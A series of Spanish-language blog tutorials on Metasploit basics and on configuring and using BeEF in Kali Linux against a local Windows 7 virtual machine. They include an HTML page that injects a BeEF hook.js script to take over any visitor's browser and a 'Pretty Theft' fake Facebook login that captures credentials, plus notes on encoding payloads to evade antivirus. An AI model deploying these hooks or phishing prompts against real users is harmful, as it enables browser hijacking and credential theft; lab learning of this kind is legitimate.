Metasploit Introduccion: Lo que necesitas saber de Metasploit

Estándar

Introduccion

hola que tal bueno el dia de hoy daremos un poco de introduccion a metasploit conceptos para un futuro tutorial que estoy planeando subir buen procedamos.

Desarrollando

Cuando se encuentre con Metasploit Framework (MSF ) por primera vez , usted puede ser abrumado por su muchas interfaces , opciones , servicios públicos , variables y módulos.por ahora daremos paso a los conceptos básicos que le ayudan a dar sentido a la imagen grande. Revisaremos alguna penetración básica probando terminología y luego cubrir brevemente las distintas interfaces de usuario que Metasploit tiene para ofrecer. Metasploit sí es software libre de código abierto , con muchos colaboradores en la comunidad de seguridad , pero hay dos versiones comerciales Metasploit también están disponibles .
La primera vez que el uso de Metasploit , es importante que no se obsesione con un exploit , en su lugar  se centre en  las funciones Metasploit y qué comandos  utilizó para realizar la hazaña posible.

Terminos que generalmente se usan en metasploit.

 

Exploit

Un exploit es el medio por el cual un atacante , o pen tester para el caso, toma ventaja de una falla en un sistema, una aplicación o un servicio. Un atacante utiliza un exploit para atacar a un sistema de una manera que da lugar a un resultado particular deseado que el desarrollador nunca pretendió . Exploits comunes son desbordamientos de búfer , vulnerabilidades de las aplicaciones web ( como la inyección SQL ), y errores de configuración.

Payload

Una payload es el código que queremos que el sistema se ejecute y que se va a seleccionar y entregado por el marco. Por ejemplo, un reverse shell  es un payload que crea una conexión desde el equipo de destino del atacante como un símbolo del sistema(commmad prompt) de Windows , mientras que un bind shell  es unpayload  que «une (binds)» un símbolo del sistema(command prompt) para un puerto de escucha(listenning) en la máquina de destino, que el atacante puede conectarse. Una carga útil también podría ser algo tan simple como un par de comandos que se ejecutan en el sistema operativo de destino.

Shellcode

Shellcode es un conjunto de instrucciones utilizadas como payload cuando se produce la explotación. Shellcode normalmente se escribe en lenguaje ensamblador. En la mayoría de los casos, se proporcionará un shell de comandos o un shell Meterpreter después de la serie de instrucciones ha sido realizado por el equipo de destino , de ahí el nombre.

Module

Un módulo en el contexto  es una pieza de software que puede ser utilizado por el Metasploit Framework . A veces , usted puede requerir el uso de un exploit module, un componente de software que lleva a cabo el ataque. Otras veces, un módulo auxiliar pueden ser necesarios para llevar a cabo una acción como el escaneado o la enumeración del sistema. Estos módulos intercambiables son el núcleo de lo que hace el Framework tan poderoso

Listener

Un Listener es un componente dentro de Metasploit que espera a una conexión entrante de algún tipo. Por ejemplo , después de que el equipo de destino ha sido explotada , puede llamar a la máquina de atacar a través de Internet . El listener se encarga de esa conexión , a la espera en la máquina atacante para ser contactado por el sistema de explotación.

Metasploit interfaces

msfconsole
Msfconsole es , con mucho, la parte más popular de Metasploit Framework , y por buenas razones . Es una de las herramientas más flexibles, con múltiples funciones , y bien soportada dentro del marco. Msfconsole ofrece una práctica interfaz todo- en-uno para casi todas las opciones y la configuración disponible en el Framework , es como una tienda de una sola parada para todas sus sueños de explotación. Usted puede utilizar msfconsole hacerlo todo, incluyendo el lanzamiento de un exploit , cargando módulos auxiliares , realizando la enumeración, la creación de los oyentes , o correr explotación masiva contra una red completa.
Aunque el Metasploit Framework está en constante cambio , un subconjunto de comandos se mantienen relativamente constantes. Por el dominio de los conceptos básicos de msfconsole , usted será capaz de mantenerse al día con los cambios. Para ilustrar la importancia de msfconsole de aprendizaje.

Inicializando el msfconsole

simplemente en una terminal tipeamos el comando

msfconsole

 

msfconsole

iniciando el msf console

Para acceder a los archivos de ayuda de msfconsole, introduzca help seguido del comando que usted está interesado pulg En el siguiente ejemplo, estamos buscando la ayuda del comando conectar, lo que nos permite comunicarnos con un host. La documentación resultante listas de uso, una descripción de la herramienta, y los diversos indicadores de opción.
msf > help connect
msfconsole

msfconsole

Bien de aqui a futuro expondremos mas a fondo lo que es y como utilizar el msf console. prosigamos
MSFcli
Msfcli y msfconsole toman muy diferentes enfoques para proporcionar acceso al Framework. Dónde msfconsole proporciona una forma interactiva de acceder a todas las funciones de una manera fácil de usar, msfcli pone la prioridad en scripting e interpretación con otras herramientas basadas en la consola. En lugar de proporcionar un intérprete único en el Framework, msfcli corre directamente desde la línea de comandos, que permite redirigir la salida de otras herramientas dentro msfcli y direccionandolo a  msfcli ouput  directo a otras herramientas de línea de comandos. Msfcli también apoya la puesta en marcha de las hazañas y módulos auxiliares, y puede ser conveniente al probar módulos o el desarrollo de nuevos exploits para el Marco. Es una herramienta fantástica para la explotación exclusiva cuando se sabe exactamente que explotan y las opciones que usted necesita. Es menos tolerantes que msfconsole, pero ofrece algo de ayuda básica (incluida la sintaxis y una lista de los modos) con el comando msfcli-h, como se muestra aquí:
msfcli
Armitage
El componente armitage de Metasploit es una interfaz gráfica de usuario totalmente interactiva creada por Raphael Mudge. Esta interfaz es muy impresionante, rico en características, y está disponible de forma gratuita. No vamos a estar cubriendo armitage en profundidad, pero es sin duda vale la pena mencionar como algo que explorar. Nuestro objetivo es enseñar los entresijos de Metasploit, y la interfaz gráfica es impresionante una vez que entienda cómo funciona realmente el Framwork.
armitage

armitage

Metasploit Utilidades
Después de haber cubierto tres interfaces principales de Metasploit , es el momento para cubrir unos servicios públicos. Utilidades de Metasploit son interfaces directos a características particulares del Framework que puede ser útil en situaciones específicas , especialmente en explotar el desarrollo. Vamos a cubrir algunas de las utilidades más accesible aquí.
msfpayload
El componente msfpayload de Metasploit le permite generar código shell , ejecutables , y mucho más para su uso en explotaciones fuera del Framework. Shellcode se puede generar en muchos formatos, incluyendo C , Ruby , JavaScript, e incluso Visual Basic para Aplicaciones. Cada formato de salida será de utilidad en diversas situaciones . Por ejemplo, si usted está trabajando con una prueba basada en Python de concepto , la producción del C-estyle podría ser lo mejor , y si usted está trabajando en un navegador explotar , un formato de salida de JavaScript podría ser lo mejor . Una vez que la salida deseada , puede insertar fácilmente la carga directamente en un archivo HTML para activar el exploit . Para ver qué opciones de la utilidad toma , introduzca msfpayload -h en la línea de comandos , como se muestra aquí:

root@Widrogo:/# msfpayload -h

Al igual que con msfcli , si usted se encuentra atascado en las opciones necesarias para un módulo de carga útil , añadir la letra S en la línea de comandos para obtener una lista de las variables requeridas y opcionales.

MSFencode
El código shell generado por msfpayload es completamente funcional , pero contiene varios caracteres nulos que , cuando se interpreta por muchos programas , significa el fin de una cadena, y esto hará que el código  finalice antes de la terminación . En otras palabras, esos x00s y xffs pueden romper su payload ! Además , shellcode que atraviesa una red en texto plano(cleartext) es probable que sea recogido por los sistemas de detección de intrusos ( IDS) y el software antivirus. Para abordar este problema , los desarrolladores de Metasploit ofrecen msfencode , que le ayuda a evitar malos personajes y evadir los antivirus y los IDS mediante la codificación de la carga original de un modo que no incluya personajes «malos» . Introduzca msfencode -h para ver una lista de opciones msfencode .
Metasploit contiene un número de diferentes codificadores para situaciones específicas. Algunos serán de utilidad cuando se puede utilizar sólo caracteres alfanuméricos , como parte de una carga útil , como es el caso de muchas hazañas de formato de archivo u otras aplicaciones que aceptan caracteres imprimibles sólo como entrada, mientras que otros son grandes codificadores de propósito general que hacen bien en todas las situaciones .
En caso de duda , sin embargo, usted realmente no puede ir mal con el codificador x86/shikata_ga_nai el único codificador con el grado de Excelente , una medida de la fiabilidad y la estabilidad de un módulo. En el contexto de un codificador , un ranking Excelente implica que es uno de los codificadores más versátiles y puede acomodar un mayor grado de ajuste fino que otros codificadores . Para ver la lista de los codificadores disponibles , añadir -l para msfencode como se muestra a continuación. Las cargas útiles están clasificados en orden de fiabilidad.

Nasm Shell
La utilidad nasm_shell.rb puede ser útil cuando usted está tratando de hacer sentido de código ensamblador , sobre todo si , explotar durante el desarrollo, es necesario identificar los códigos de operación (las instrucciones de montaje ) para un comando de montaje dada.

 

Ingenieria Social Metasploit (II) con The Browser Exploitation Framework (BeEF) con Kali Linux

Estándar

Recordando

Bueno en mi anterior tutorial mostramos un poco de la funcion de beef usando algo de Social Engineering, ahora vamos a aplicar le mismo ejercicio a un diferente explorador con un poco de nginx. ya iniciamos todos los servicios que hay que iniciar y proceguimos a otro ejercicio.

Desarrollando

Bueno aclarar que tienen que tener una maquina virtual instalada en mi caso es windows 7 ahora sigamos.

Iniciamos nginx y beef:

service nginx start

service php4-fpm start

Tenemos que tener beef iniciado:

msfconsole_beef

iniciando_beef

entramos a el panel como en el tutorial anterior:

beef_login

Por defecto

Usuario: beef

Password: beef

Selección_006

Aqui en offline browsers vemos algunos exploradores enganchados anteriormente solo son pruebas que hice algunas para este tutorial no las borre. Pero ahora iniciamos nuestra maquina virtual y abrimos un explorador en mi caso sera un chrome, por el cual ingresaremos a nuestro servidor nginx local.

Ahora ingresamos:

cd /usr/share/nginx/www

y creamos un archivo llamado clubfc.html el nombre puede variar no importa mucho lo que me interesa en el contenido:

nano clubfc.html

Guardamos y adentro colocamos el siguiente codigo:

<!doctype html>
<HTML>
  <head>

<title>beef total</title>
</head>

<script src= «http://192.168.1.5:3000/hook.js»type =»text/javascript»></script>
<script>
    
    var commandModuleStr = ‘<script src=»‘ + window.location.protocol + ‘//’ + window.location.host + ‘/hook.js» type=»text/javascript»><\/script>’;
    document.write(commandModuleStr);

</script>
<body>

<h1>BeEF Una Gran Herramienta</h1>

     <p> esto es la etiqueta de párrafo, introduciremos el texto  que deseemos.

Con este ejemplo os quiero mostrar lo sencillo que nos resultaría crear una pagina Web , la cual nos permitiera acceder a todos y cada                    uno de los equipos  que la visitaran creando zombies..¿suena bien verdad?
</p>

</body>

</HTML>

Bien ya tenemos el archivo, ahora voy a explicar que contiene este archivo html solo nos debemos concentrar en la parte de script en esta parte puse un src= «http://192.168.1.5:3000/hook.js» que direcciona a hacia nuestro beef y el explorador que ingrese a ese html quedara engancha a nuestro beef y podemos hacer un ataque parecido al del anterior tuto lo demas es relleno incluso pueden hacerlo lucir mejor con un poco de CSS bien vamos a ver nuestro html como luce junto con nginx y que sucede en el panel debera quedar el explorador enganchado, primero en mi maquina virtual esto luce asi:

Maquina virtual windows7

virtualbox_windows

Como podemos apreciar estamos direccionando a mi ip 192.168.1.5/clubfc.html y ademas mostrando el archivo html que creamos, ahora el BeEF seguramente al ingresar a este html ya engancho el explorador, que es un google chrome veremos que ip presenta.

Selección_015

por terminal tambien podemos ver como engancho o que engancho el BeEF.

BEEF-engancho

Como podemos apreciar en el panel de BeEF  esta imagen en el boton Details veremos algunos datos del navegador como el sistema operativo que usa, etc, la herramienta engancho a el explorador haremos un ataque sencillo con el login facebook como el anterior tutorial solo para ver que sirve.

beef_panel

presionamos beef_execute

y miramos que sucede  en la maquina virtual en el google chrome.

beef_social_engineering

igualmente podemos ingresar algunos datos y nos tendria que aparecer en el Pretty Thref donde hicimos el ataque de este login

pretty_thef

ahora haremos algo parecido solo que con facebook en un siguiente tutorial

Ingenieria Social Metasploit (I) con The Browser Exploitation Framework (BeEF) con Kali Linux

Estándar

Recordandologo

Tutoriañes anteriores:

https://widrogo.wordpress.com/2014/01/14/introduciendonos-a-the-browser-exploitation-framework-beef-con-kali-linux/

https://widrogo.wordpress.com/2014/01/14/configurando-metasploit-a-the-browser-exploitation-framework-beef-con-kali-linux/

En anteriores tutoriales mostramos como configurar correctamente los archivos de beef tambien como habilitar los Metasploit con la msfconsole ahora avanzaremos, en que tipos de ataques puedo lanzar con BeEF.

Desarrollo

Primeramente vamos a iniciar mediante terminal  nuestros servicios que utilizaremos en el desarrollo de este ejercicio lo servicios a iniciar son, NGINX, PHP5-FPM ,MSFCONSOLE, BEEF, TOR Y PRIVOXI  los servicios de tor y privoxi no son necesarios son para conservar nuestro anonimato pero como seran pruebas locales no las necesitaremos, pero es importante saber de su uso por eso le deje el link que lo dirigira a uno de mis tutos dobre instalacion y configuracion de este continuemos, de la siguiente manera vamos iniciando todos los servicios:

service nginx start

service php5-fpm start

service tor start

service privoxi start

Ahora iniciamos BeEF con el metasploit que se inicia en msfconsole asi:

ingresamos a la carpeta de BeEF metasploit mediante terminal:

cd /usr/share/beef-xss/extensions/metasploit

y luego iniciamos la msfconsole para el metasploit:

msfconsole -r BeEF.rc

Sin problemas miraremos esto:

msfconsole_beef

Bien ahora ingresamos a la carpeta de beef y lo iniciamos:

cd /usr/share/beef-xss

./beef

lucira asi sin errores :

iniciando_beef

sin problemas ahora como en los tutoriales anteriores ahora avancemos.

En un explorador en mi caso Icewaesel, abrimos nuestro BeEF Panel en la siguiente pantalla mostraremos esto. En mi caso la direccion es la siguiente:

http://192.168.1.5:3000/ui/panel

Al poner esta direccion en un explorador lucira asi:

beef_login

Por defecto el usuario y la clave son: beef

Selección_006

podran ller algo asi

Getting Started

Welcome to BeEF!

Before being able to fully explore the framework you will have to ‘hook’ a browser. To begin with you can point a browser towards the basic demo page here, or the advanced version here.

 

estara con azul el segundo HERE . Bueno ahora nos llevara a la siguiente pagina que es mi ip, en su caso la ip sera distinta supongo:

http://192.168.1.5:3000/demos/butcher/index.html

donde nos mostrara esto:

meat_beef

y si volvemos al panel veremos claramente que la herramienta agarro nuestro ip:

beef_ip

donde dice Online Browsers:

ahora que pasa por terminal lo siguiente :

ip_agarrado_beef

bien ahora tenemos un explorador  como podemos ver en terminal no muestra algunos datos como ser ip y demas la cosa es que tenemos un explorador enganchado a nuestro beef, en este caso en mi explorador por lo tanto la ip sera la mia en un proximo tutotial mostrare mas a fondo esto ahora quiero enfocarme que podemos hacer caundo tenemos un explorador enganchado.

volvemos al panel:

beef_panel

 

Bueno presionamos en la ip donde dice Online Browser ahora pulsamos en la ip en mi caso 192.168.1.5 luego en commands buscamos Social Engineering luego presionamos en Pretty Thef debe estar con un boton naranja al principio bueno nos aparecera la anterior pantalla y presionamos el boton Execute.

beef_execute

ahora miramos que pasa en la direccion dada anteriormente esta:

meat_beef

Ahora que PRESIONAMOS EXECUTE pasa esto:

beef_attack

Mira ahora aparecio una ventanita con estilo parecido al Facebook don una persona puede poner su email y password y quedara grabado en el panel de BeEF, en este caso puse un email  y password falsos. y lo podremos mirar en el panel:

beef_panel

 

pretty_thef

ahora en un siguiente tutorial mostrare otro tipo de ataque en una maquina virtual asi que tengan lista sus virtuales ok.

Configurando Metasploit a The Browser Exploitation Framework (BeEF) con Kali Linux

Estándar

En un tutorial anterior ya vimos con hacer algunas de las configuraciones esto es solo la finalizacion bueno empecemos.

iniciando_beef

Bueno como podran apreciar en la imagen el metasploit esta activado:

[*] Successful connection with Metasploit.

[*] Loaded 257 Metasploit exploits.

Explicare como hacer funcionar esto en un anterior tutorial explicamos que entren a /usr/share/beef-xss y  busquen el archivo config.yaml para modificarlo.

cd /usr/share/beef-xss

vim config.yaml

Y buscamos la parte metasploit y la ponemos enable: true.

       metasploit:
            enable: true

Eso ya lo explique anteriormente aqui. Bueno realicen todo lo explicado y avancemos.

Bien esto es nuevo ahora entramos a:

cd /usr/share/beef-xss/extensions/metasploit

Y creamos un archivo llamado BeEF.rc asi:

nano BeEF.rc

ahora dentro de este ponemos lo siguiente:

load msgrpc ServerHost=192.168.1.5 Pass=abc123

Ahora lo guardamos ctrl+o y ctrl+x listo, el 192.168.1.5 es mi ip de mi maquina el Pass esta por defecto en la misma carpeta /usr/share/beef-xss/extensions/metasploit en un archivo que se llama config.yaml ahora que tambien configuramos anteriormente.

Ahora bien usaremos la msfconsole la buena msfconsole bien sin salir de la carpeta /usr/share/beef-xss/extensions/metasploit y ahi ejecutamos el siguiente comando:

msfconsole -r BeEF.rc

esperamos y miraremos algo parecido a esto:

msfconsole_beef

ahora ya esta todo listo hacemos correr BeEF nuevamente en una nueva terminal dejen la anterior terminal abierta, nos vamos a la carpeta donde se encuentra.

cd /usr/share/beef-xss

./beef

y ya tendra que estar el metasploit:

iniciando_beef

Bueno como podran apreciar en la imagen el metasploit esta activado:

[*] Successful connection with Metasploit.

[*] Loaded 257 Metasploit exploits.

y ya esta bien el metasploit en un siguiente tuto empezaremos a usar todas estas herramientas instaladas y configuradas.

Introduciendonos a The Browser Exploitation Framework (BeEF) con Kali Linux

Estándar

¿Qué es la BeEF?logo

La BeEF es la abreviatura de The Browser Exploitation Framework. Es una herramienta de pruebas de penetración que se centra en el navegador web.

En medio de la creciente preocupación por los ataques procedentes de Internet en contra de los clientes, incluyendo clientes móviles, BeEF permite la prueba de intrusión profesional para evaluar la situación de seguridad actual de un entorno de destino mediante el uso de vectores de ataque del lado del cliente. A diferencia de otros marcos de seguridad, BeEF mira más allá del perímetro de la red endurecido y sistema cliente, y examina explotabilidad en el marco de la puerta abierta: el navegador web. BeEF enganchará uno o más de los navegadores web y los utilizan como cabezas de playa para el lanzamiento de los módulos de comando dirigidas y nuevos ataques contra el sistema desde dentro del contexto del explorador.

Overview

The Browser Exploitation Framework (BeEF ) es una poderosa herramienta de seguridad profesional. La BeEF es técnicas pioneras que proporcionan la prueba de intrusión con experiencia con los vectores de ataque del lado del cliente prácticos. A diferencia de otros marcos de seguridad , BeEF se centra en el aprovechamiento de las vulnerabilidades del navegador para evaluar la postura de seguridad de un objetivo. Este proyecto es desarrollado exclusivamente para la investigación legal y pruebas de penetración .

BeEF engancha uno o más navegadores web como cabezas de playa para la puesta en marcha de los módulos de mando dirigidos . Cada navegador es probable que sea en un contexto de seguridad diferente , y cada contexto puede proporcionar un conjunto de vectores de ataque únicos. El marco permite que el probador de la penetración para seleccionar los módulos específicos ( en tiempo real ) para apuntar cada navegador , y por lo tanto cada contexto.

El marco contiene numerosos módulos de comando que emplean API sencilla y potente de la BeEF. Esta API está en el corazón de la eficacia y eficiencia de la estructura. Se abstrae la complejidad y facilita el desarrollo rápido de los módulos personalizados.

Introduccion

Como introduccion a BeEF quisiera hablar un poco de la configuracion y como iniciarlo:

Pasemos a la practica bueno la verdad quieren saber mas de BeEF entren a los siguientes enlaces lean la documentacion:

http://www.beefproject.com/

https://github.com/beefproject/beef/wiki

Bueno lo que aqui voy a mostrar es como usarlo primero una serie de requisitos:

  • tener instalado apache o nginx no cualquiera el que sea de su preferencia no me interesa o tambien pueden tener instalado los 2  alla ustedes.
  • tener instalado virtual box.
  • una maquina virtual windows para hacer pruebas.

En Kali linux ya tenemos instalado por defecto a BeEF su localizacion es en /usr/share/beef-xss o tambien en «Kali Linux>herramiental de explotacion>plataforma XSS BeEF» bueno pero entramos por terminal empezaremos a correr el programa.

Entramos al directorio de BeEF por terminal

captura1

ahora con el comando en terminal

cd /usr/share/beef-xss

vim config.yaml

entramos  a la configuracion de beef lucira parecido a esto pero no he copiado todo el archivo:

#
# Copyright (c) 2006-2013 Wade Alcorn – wade@bindshell.net
# Browser Exploitation Framework (BeEF) – http://beefproject.com
# See the file ‘doc/COPYING’ for copying permission
#
# BeEF Configuration file

beef:
    version: ‘0.4.4.8-alpha’
    debug: false

    […]

    […]
    # You may override default extension configuration parameters here
    extension:
        requester:
            enable: true
        proxy:
            enable: true
        metasploit:
            enable: false
        social_engineering:
            enable: true
        evasion:
            enable: false
        console:
             shell:
                enable: false
        ipec:
            enable: true

Lo que quiero es cambiar la parde de metasploit justamente asi:

       metasploit:
            enable: true

Guardamos y cerramos el archivo.

Ahora en /usr/share/beef-xss/extensions/metasploit igualmente configuramos el archivo config.yaml.

cd /usr/share/beef-xss/extensions/metasploit

vim config.yaml

En las partes donde diga <TU DIRECCION IP AQUI> solo pongan su direccion ip. En caso de que no sepas tu direccion ip mirala con el siguiente comando en terminal:

ifconfig

ifconfig

En mi caso mi direccion ip es 192.168.1.5  la pongo en <TU DIRECCION IP AQUI> en el config.yaml y entre las comillas sera algo asi:

config.yaml

#
# Copyright (c) 2006-2013 Wade Alcorn – wade@bindshell.net
# Browser Exploitation Framework (BeEF) – http://beefproject.com
# See the file ‘doc/COPYING’ for copying permission
#
# Enable MSF by changing extension:metasploit:enable to true
# Then set msf_callback_host to be the public IP of your MSF server
#
# Ensure you load the xmlrpc interface in Metasploit
# msf > load msgrpc ServerHost=10.211.55.2 Pass=abc123 ServerType=Web
# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.
# Also always use the IP of your machine where MSF is listening.
beef:
    extension:
        metasploit:
            name: ‘Metasploit’
            enable: true
            host: «<TU DIRECCION IP AQUI>»
            port: 55552
            user: «msf»
            pass: «abc123»
            uri: ‘/api’
            ssl: false
            ssl_version: ‘SSLv3’
            ssl_verify: true
            callback_host: «<TU DIRECCION IP AQUI>«
            autopwn_url: «autopwn»
            auto_msfrpcd: false
            auto_msfrpcd_timeout: 120
            msf_path: [
              {os: ‘osx’, path: ‘/opt/local/msf/’},
              {os: ‘livecd’, path: ‘/opt/metasploit-framework/’},
              {os: ‘bt5r3’, path: ‘/opt/metasploit/msf3/’},
              {os: ‘bt5’, path: ‘/opt/framework3/msf3/’},
              {os: ‘backbox’, path: ‘/opt/metasploit3/msf3/’},
              {os: ‘kali’, path: ‘/usr/share/metasploit-framework/’},
              #{os: ‘pentoo’, path: ‘/usr/lib64/metasploit9999/’},
              {os: ‘pentoo’, path: ‘/usr/lib/metasploit’},
              {os: ‘win’, path: ‘c:\\metasploit-framework\\’},
              {os: ‘custom’, path: »}
            ]

Guardamos y salimos. Bien ahora iniciamos el beef abrimos una terminal en nuestro Kali Linux y ejecutamos:

cd /usr/share/beef-xss

./beef

miraremos algo asi:

iniciando_beef

en mi caso ya esta ejecutandose el Metasploit en el siguiente tutorial explicare como configurar metasploit.